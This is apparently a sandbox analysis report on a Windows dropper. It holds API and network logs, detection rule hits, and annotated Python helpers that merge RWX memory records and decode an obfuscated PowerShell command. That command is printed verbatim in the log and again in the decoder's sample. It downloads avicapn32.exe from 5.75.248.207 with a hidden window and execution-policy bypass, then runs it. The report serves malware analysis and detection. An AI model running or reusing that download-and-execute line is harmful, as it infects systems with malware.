registers.ecx: 784896 (0x000bfa00)
1 0 0

Register values are logged in decimal; the hex equivalents are added for reading. address minus offset (0xb70e5f - 0x770e5f) gives 0x00400000, the load base of avicapn32.exe, which is also the value held in edi, and the stack frame avicapn32+0xad56aa @ 0xed56aa is consistent with the same base. 0x80000004 is STATUS_SINGLE_STEP: a single-step trap raised on a plain nop is what a deliberately set trap flag (for example pushfd / or dword [esp], 0x100 / popfd) produces, a technique packers use to detect single-stepping debuggers and to route control flow through exception handlers. Note that avicapn32.exe, started by the final "&" call of the PowerShell script, does not appear in the process tree as extracted at the top of this page; this exception record is its only trace here.
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://5.75.248.207/avicapn32.exe
request: GET http://5.75.248.207/avicapn32.exe
Time & API | Arguments | Status | Return | Repeated

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02770000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2704
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2704
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02632000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02682000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02683000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02684000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02685000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02930000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02686000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
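The records above are consecutive 4 KB commits of PAGE_EXECUTE_READWRITE memory in process 2704 made through process_handle 0xffffffff, the current-process pseudo-handle: the process is growing an RWX region in its own address space one page at a time, which is what an unpacker or JIT stub looks like, not what a remote injection into another process looks like. The Python below is an added example, not part of this report or of the sample, that parses this flattened record layout and merges adjacent RWX pages into regions so the listing can be read as one allocation instead of dozens; its only input is three of the records copied from this report.

```python
import re

# Constructed sample: three consecutive records copied from this report, in the flattened
# "API name / key: value lines / status return repeated" layout the listing uses.
SAMPLE = """
NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
"""

STATUS_ROW = re.compile(r"^-?\d+(?: -?\d+)*$")   # e.g. "1 0 0" = status, return, repeated


def parse_api_records(text):
    """Split the flattened listing into records: API name, argument map, status/return/repeated."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Time & API"):   # blank or table-header line
            continue
        if STATUS_ROW.match(line):                       # the numeric row closes a record
            if current is not None:
                nums = [int(n) for n in line.split()] + [None, None, None]
                current["status"], current["return"], current["repeated"] = nums[:3]
                records.append(current)
                current = None
        elif ":" in line and current is not None:        # "key: value" argument line
            key, _, value = line.partition(":")
            current["args"][key.strip()] = value.strip()
        else:                                            # a bare API name opens a record
            current = {"api": line, "args": {}}
    return records


def rwx_regions(records):
    """Merge successful PAGE_EXECUTE_READWRITE commits into contiguous regions.
    Returns (pid, start, end, in_own_process) tuples with end exclusive."""
    pages = set()
    for rec in records:
        a = rec["args"]
        if rec["api"] != "NtAllocateVirtualMemory" or rec.get("status") != 1:
            continue
        if "PAGE_EXECUTE_READWRITE" not in a.get("protection", ""):
            continue
        base = int(a["base_address"], 16)
        size = int(a["region_size"].split()[0])
        # 0xffffffff is the current-process pseudo-handle: the caller is carving RWX memory
        # in its own address space (unpacking or JIT), not in a remote target.
        own = a.get("process_handle", "").lower() == "0xffffffff"
        pages.add((int(a.get("process_identifier", 0)), base, size, own))
    regions = []
    for pid, base, size, own in sorted(pages):
        last = regions[-1] if regions else None
        if last and last[0] == pid and last[3] == own and last[2] == base:
            last[2] = base + size                         # adjacent page: extend the region
        else:
            regions.append([pid, base, base + size, own])
    return [tuple(r) for r in regions]


if __name__ == "__main__":
    for pid, start, end, own in rwx_regions(parse_api_records(SAMPLE)):
        print(f"pid {pid}: RWX {start:#010x}-{end:#010x}, {(end - start) // 4096} pages, "
              f"{'own process' if own else 'remote process'}")
```

Run against the whole listing, the same parser collapses the run of records on this page into a single region starting at 0x0503a000; a region that keeps growing by exactly one page per call is a stronger signal than any single RWX allocation.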
file C:\Users\test22\AppData\Local\Temp\avicapn32.exe
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex BYPAsS -noNI -W HiddEn $EFGiZIWe = [NET.WebrEQuest]::CreaTe( ([chAR] 104 + [chAR] 116 + [cHAr] 116 + [ChAr] 112 + [chAR] 58 + [cHar] 47 + [cHaR] 47 + [CHAr] 53 + [CHAr] 46 + [chAr] 55 + [CHAr] 53 + [ChaR] 46 + [CHAr] 50 + [cHAR] 52 + [cHaR] 56 + [CHaR] 46 + [CHar] 50 + [chaR] 48 + [chAr] 55 + [Char] 47 + [CHar] 97 + [cHaR] 118 + [CHAR] 105 + [CHaR] 99 + [CHar] 97 + [cHAr] 112 + [char] 110 + [ChaR] 51 + [cHAr] 50 + [char] 46 + [chAr] 101 + [ChAr] 120 + [Char] 101 ) ).GEtResPOnSE( ).COntenTleNgth ; ( New-OBJeCt ( [char] 78 + [chAr] 101 + [CHAr] 116 + [cHAR] 46 + [cHAr] 87 + [ChAR] 69 + [ChAR] 66 + [char] 67 + [cHAr] 108 + [chaR] 73 + [ChAr] 101 + [chaR] 110 + [chAR] 116 )).( [chaR] 100 + [chAR] 111 + [ChAR] 119 + [Char] 110 + [cHaR] 108 + [ChaR] 111 + [CHAR] 97 + [Char] 68 + [CHAr] 70 + [cHAR] 105 + [CHar] 76 + [ChAR] 101 + [cHaR] 97 + [cHar] 115 + [ChaR] 121 + [ChAR] 110 + [cHAR] 99 ).inVOKE( ([chAR] 104 + [cHAr] 116 + [ChAr] 116 + [chAR] 112 + [cHar] 58 + [cHaR] 47 + [CHAr] 47 + [CHAr] 53 + [chAr] 46 + [CHAr] 55 + [ChaR] 53 + [CHAr] 46 + [cHAR] 50 + [cHaR] 52 + [CHaR] 56 + [CHar] 46 + [chaR] 50 + [chAr] 48 + [Char] 55 + [CHar] 47 + [cHaR] 97 + [CHAR] 118 + [CHaR] 105 + [CHar] 99 + [cHAr] 97 + [char] 112 + [ChaR] 110 + [cHAr] 51 + [char] 50 + [chAr] 46 + [ChAr] 101 + [Char] 120 + [CHar] 101 ) , 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ) ; If ( TesT-PATh 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ) { dO { $BGyLZQxsIspBheUMTlPoHVXx = ([Io.FIlEINfo] 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ).lEnGth } UnTIL ( $BGyLZQxsIspBheUMTlPoHVXx -EQ $EFGiZIWe )} ; "&" 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe'
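The command line above builds every string that matters (the download URL, the .NET class and the method name) from [char] arithmetic, so a plain string search for WebClient or for the host finds nothing, and the switch names and cmdlet names are case-mangled for the same reason. The Python below is an added example, not part of this report or of the sample, that folds those runs back into literals and pulls the IOCs out; its only input is the command line copied from this report. Decoded, the script reads the Content-Length of http://5.75.248.207/avicapn32.exe with Net.WebRequest, starts Net.WebClient.DownloadFileAsync to %TEMP%\avicapn32.exe, spins in a do/until loop until the file's length equals that Content-Length (the loop is the download's only completion check), and then invokes the file; the URL and path it recovers match the GET /avicapn32.exe to 5.75.248.207 and the dropped file recorded elsewhere in this report.

```python
import re

# Constructed sample: the command line from this report. The three [char] expressions are
# copied verbatim (the URL expression appears twice in the original, as it does here).
URL_EXPR = ("[chAR] 104 + [chAR] 116 + [cHAr] 116 + [ChAr] 112 + [chAR] 58 + [cHar] 47 + "
            "[cHaR] 47 + [CHAr] 53 + [CHAr] 46 + [chAr] 55 + [CHAr] 53 + [ChaR] 46 + "
            "[CHAr] 50 + [cHAR] 52 + [cHaR] 56 + [CHaR] 46 + [CHar] 50 + [chaR] 48 + "
            "[chAr] 55 + [Char] 47 + [CHar] 97 + [cHaR] 118 + [CHAR] 105 + [CHaR] 99 + "
            "[CHar] 97 + [cHAr] 112 + [char] 110 + [ChaR] 51 + [cHAr] 50 + [char] 46 + "
            "[chAr] 101 + [ChAr] 120 + [Char] 101")
CLASS_EXPR = ("[char] 78 + [chAr] 101 + [CHAr] 116 + [cHAR] 46 + [cHAr] 87 + [ChAR] 69 + "
              "[ChAR] 66 + [char] 67 + [cHAr] 108 + [chaR] 73 + [ChAr] 101 + [chaR] 110 + "
              "[chAR] 116")
METHOD_EXPR = ("[chaR] 100 + [chAR] 111 + [ChAR] 119 + [Char] 110 + [cHaR] 108 + [ChaR] 111 + "
               "[CHAR] 97 + [Char] 68 + [CHAr] 70 + [cHAR] 105 + [CHar] 76 + [ChAR] 101 + "
               "[cHaR] 97 + [cHar] 115 + [ChaR] 121 + [ChAR] 110 + [cHAR] 99")
DROP = "'C:\\Users\\test22\\AppData\\Local\\Temp\\avicapn32.exe'"
SAMPLE = (
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ex BYPAsS -noNI -W HiddEn "
    f"$EFGiZIWe = [NET.WebrEQuest]::CreaTe( ({URL_EXPR} ) ).GEtResPOnSE( ).COntenTleNgth ; "
    f"( New-OBJeCt ( {CLASS_EXPR} )).( {METHOD_EXPR} ).inVOKE( ({URL_EXPR} ) , {DROP} ) ; "
    f"If ( TesT-PATh {DROP} ) {{ dO {{ $BGyLZQxsIspBheUMTlPoHVXx = ([Io.FIlEINfo] {DROP} ).lEnGth }} "
    f"UnTIL ( $BGyLZQxsIspBheUMTlPoHVXx -EQ $EFGiZIWe )}} ; \"&\" {DROP}"
)

# One "[char] 104" term, in any letter case and with any spacing.
TERM = re.compile(r"\[\s*char\s*\]\s*(\d+)", re.IGNORECASE)
# Two or more terms joined by "+": one obfuscated string.
RUN = re.compile(r"(?:\[\s*char\s*\]\s*\d+\s*(?:\+\s*)?){2,}", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
WIN_PATH = re.compile(r"[A-Za-z]:\\[^\s'\"]+")


def _fold(match):
    """Turn one matched run of [char] terms into the string it builds."""
    return "".join(chr(int(n)) for n in TERM.findall(match.group(0)))


def decoded_strings(text):
    """Every [char]-concatenated string, in the order it appears."""
    return [_fold(m) for m in RUN.finditer(text)]


def deobfuscate(text):
    """Replace each [char] run with the quoted literal it builds so the command reads normally."""
    return RUN.sub(lambda m: "'" + _fold(m) + "'", text)


def _uniq(items):
    seen = []
    for item in items:
        if item not in seen:
            seen.append(item)
    return seen


def extract_iocs(text):
    """URLs, Windows paths and decoded .NET member names from the deobfuscated command."""
    clear = deobfuscate(text)
    names = decoded_strings(text)
    return {
        "urls": _uniq(URL.findall(clear)),
        "paths": _uniq(WIN_PATH.findall(clear)),
        # PowerShell member lookup is case-insensitive, so fold case before matching on these.
        "dotnet": sorted({s.lower() for s in names if not s.lower().startswith("http")}),
    }


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(extract_iocs(SAMPLE))
```

The decoder is deliberately narrow: it handles the [char] N + [char] M pattern this sample uses and nothing else, so a variant that switches to -join, [string]::Join or format strings needs another rule. Running the deobfuscated command through a case-insensitive match for downloadfileasync and net.webclient is the check that the original, mixed-case command line defeats.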
file C:\Users\test22\AppData\Local\Temp\avicapn32.exe
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15 (GAA_FLAG_SKIP_UNICAST | GAA_FLAG_SKIP_ANYCAST | GAA_FLAG_SKIP_MULTICAST | GAA_FLAG_SKIP_DNS_SERVER)
family: 0 (AF_UNSPEC)
111 (ERROR_BUFFER_OVERFLOW: the first call only sizes the output buffer) 0
Data received HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Jan 2023 00:31:39 GMT Content-Type: application/octet-stream Content-Length: 9242736 Last-Modified: Thu, 26 Jan 2023 23:29:00 GMT Connection: keep-alive ETag: "63d30cbc-8d0870" Accept-Ranges: bytes [body: start of the downloaded PE image; the capture shows the MZ header, the "This program cannot be run in DOS mode" stub, a PE header whose machine field 0x14c (the "L" after "PE") marks an i386 image, and the section names .text .rdata .data .00cfg .tls .vmp .voltbl .ndex0 .ndex1 .ndex2 .rsrc, several of them non-standard and consistent with a packed or protected binary; the remaining bytes are binary and are not reproduced]
Data sent GET /avicapn32.exe HTTP/1.1 Host: 5.75.248.207 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
rule Create_Service: Create a Windows service
rule Network_DGA: Communication using DGA
rule Network_TCP_Socket: Communications over RAW Socket
rule ScreenShot: Take ScreenShot
rule Network_DNS: Communications use DNS
rule Str_Win32_Internet_API: Match Windows Inet API call
rule Code_injection: Code injection with CreateRemoteThread in a remote process
rule Generic_PWS_Memory_Zero: PWS Memory
rule Sniff_Audio: Record Audio
rule Network_HTTP: Communications over HTTP
rule local_credential_Steal: Steal credential
rule KeyLogger: Run a KeyLogger
rule Network_P2P_Win: Communications over P2P network
rule Network_Downloader: File Downloader
rule Escalate_priviledges: Escalate privileges
rule DebuggerCheck__GlobalFlags: (no description)
rule DebuggerCheck__QueryInfo: (no description)
rule DebuggerCheck__RemoteAPI: (no description)
rule DebuggerHiding__Thread: (no description)
rule DebuggerHiding__Active: (no description)
rule DebuggerException__ConsoleCtrl: (no description)
rule DebuggerException__SetConsoleCtrl: (no description)
rule ThreadControl__Context: (no description)
rule SEH__vectored: (no description)
rule Check_Dlls: (no description)
rule anti_dbg: Checks if being debugged
rule antisb_threatExpert: Anti-Sandbox checks for ThreatExpert
rule disable_dep: Bypass DEP
rule win_hook: Affect hook table
rule Network_FTP: Communications over FTP
rule Str_Win32_Http_API: Match Windows Http API call
host 5.75.248.207
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description powershell.exe tried to sleep 5456329 seconds, actually delayed analysis time by 5456329 seconds
Time & API Arguments Status Return Repeated

send

buffer: GET /avicapn32.exe HTTP/1.1 Host: 5.75.248.207 Connection: Keep-Alive
socket: 1416
sent: 75
1 75 0

WSASend

buffer: GET /avicapn32.exe HTTP/1.1 Host: 5.75.248.207
socket: 1424
0 0
Time & API Arguments Status Return Repeated

recv

buffer: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Jan 2023 00:31:39 GMT Content-Type: application/octet-stream Content-Length: 9242736 Last-Modified: Thu, 26 Jan 2023 23:29:00 GMT Connection: keep-alive ETag: "63d30cbc-8d0870" Accept-Ranges: bytes [start of the PE image: MZ header, DOS stub, i386 PE header and the section names .text .rdata .data .00cfg .tls .vmp .voltbl .ndex0 .ndex1 .ndex2 .rsrc; the binary remainder of the 2920-byte chunk is not reproduced]
received: 2920
socket: 1416
1 2920 0
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\avicapn32.exe"
option -ex bypass value Attempts to bypass execution policy
option -w hidden value Attempts to execute command with a hidden window
option -noni value Prevents creating an interactive prompt for the user
